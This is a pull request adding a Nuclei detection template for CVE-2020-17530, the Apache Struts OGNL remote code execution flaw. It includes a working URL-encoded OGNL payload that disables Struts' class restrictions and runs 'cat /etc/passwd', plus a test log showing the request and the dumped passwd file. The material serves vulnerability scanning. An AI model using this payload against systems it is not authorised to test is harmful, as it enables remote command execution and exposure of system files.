### PR TITLE
Add CVE-2020-17530

### DIFF
--- a/cves/2020/CVE-2020-17530.yaml
+++ b/cves/2020/CVE-2020-17530.yaml
@@ -23,4 +23,4 @@ requests:
       - type: regex
         regex:
           - "root:[x*]:0:0:"
-        part: body 
+        part: body

--- a/cves/2020/CVE-2020-17530.yaml
+++ b/cves/2020/CVE-2020-17530.yaml
@@ -5,7 +5,7 @@ info:
   author: pikpikcu
   severity: critical
 
-  # Forced OGNL evaluation, when evaluated on raw user input in tag attributes, 
+  # Forced OGNL evaluation, when evaluated on raw user input in tag attributes,
   # may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.
   # References:
   # http://jvn.jp/en/jp/JVN43969166/index.html

--- a/cves/2020/CVE-2020-17530.yaml
+++ b/cves/2020/CVE-2020-17530.yaml
@@ -1,0 +1,26 @@
+id: CVE-2020-17530
+
+info:
+  name: Apache Struts RCE
+  author: pikpikcu
+  severity: critical
+
+  # Forced OGNL evaluation, when evaluated on raw user input in tag attributes, 
+  # may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.
+  # References:
+  # http://jvn.jp/en/jp/JVN43969166/index.html
+  # http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html
+  # https://cwiki.apache.org/confluence/display/WW/S2-061
+  # https://security.netapp.com/advisory/ntap-20210115-0005/
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
+        part: body 


### PR DESCRIPTION
### Test Demo
```

                       __     _ 
     ____  __  _______/ /__  (_)
    / __ \/ / / / ___/ / _ \/ / 
   / / / / /_/ / /__/ /  __/ /  
  /_/ /_/\__,_/\___/_/\___/_/   v2.1									  

		projectdiscovery.io

[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] [CVE-2020-17530] Loaded template Apache Struts RCE (@pikpikcu) [critical]
[INF] Dumped HTTP request for http://redacted (CVE-2020-17530)

GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1
Host: redacted
Connection: close
Accept: */*
Accept-Language: en
Connection: close
User-Agent: Nuclei - Open-source project (github.com/projectdiscovery/nuclei)

[INF] Dumped HTTP response for http://redacted (CVE-2020-17530)

HTTP/1.1 200 OK
Connection: close
Content-Length: 1869
Content-Language: en
Content-Type: text/html;charset=utf-8
Date: Wed, 27 Jan 2021 18:43:23 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Server: Jetty(9.4.31.v20200723)
Set-Cookie: JSESSIONID=node01d5xsf83yrztpquc75gibtyw210.node0; Path=/




<html>
<head>
    <title>S2-059 demo</title>

</head>
<body>
<a id="root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
" href="/.action;jsessionid=node01d5xsf83yrztpquc75gibtyw210.node0">your input id: %{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("cat /etc/passwd")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
    <br>has ben evaluated again in id attribute</a>
</body>
</html>
[CVE-2020-17530] [http] http://redacted/?id=%%25%%7B%%28%%23instancemanager%%3D%%23application%%5B%%22org.apache.tomcat.InstanceManager%%22%%5D%%29.%%28%%23stack%%3D%%23attr%%5B%%22com.opensymphony.xwork2.util.ValueStack.ValueStack%%22%%5D%%29.%%28%%23bean%%3D%%23instancemanager.newInstance%%28%%22org.apache.commons.collections.BeanMap%%22%%29%%29.%%28%%23bean.setBean%%28%%23stack%%29%%29.%%28%%23context%%3D%%23bean.get%%28%%22context%%22%%29%%29.%%28%%23bean.setBean%%28%%23context%%29%%29.%%28%%23macc%%3D%%23bean.get%%28%%22memberAccess%%22%%29%%29.%%28%%23bean.setBean%%28%%23macc%%29%%29.%%28%%23emptyset%%3D%%23instancemanager.newInstance%%28%%22java.util.HashSet%%22%%29%%29.%%28%%23bean.put%%28%%22excludedClasses%%22%%2C%%23emptyset%%29%%29.%%28%%23bean.put%%28%%22excludedPackageNames%%22%%2C%%23emptyset%%29%%29.%%28%%23arglist%%3D%%23instancemanager.newInstance%%28%%22java.util.ArrayList%%22%%29%%29.%%28%%23arglist.add%%28%%22cat+%%2Fetc%%2Fpasswd%%22%%29%%29.%%28%%23execute%%3D%%23instancemanager.newInstance%%28%%22freemarker.template.utility.Execute%%22%%29%%29.%%28%%23execute.exec%%28%%23arglist%%29%%29%%7D


```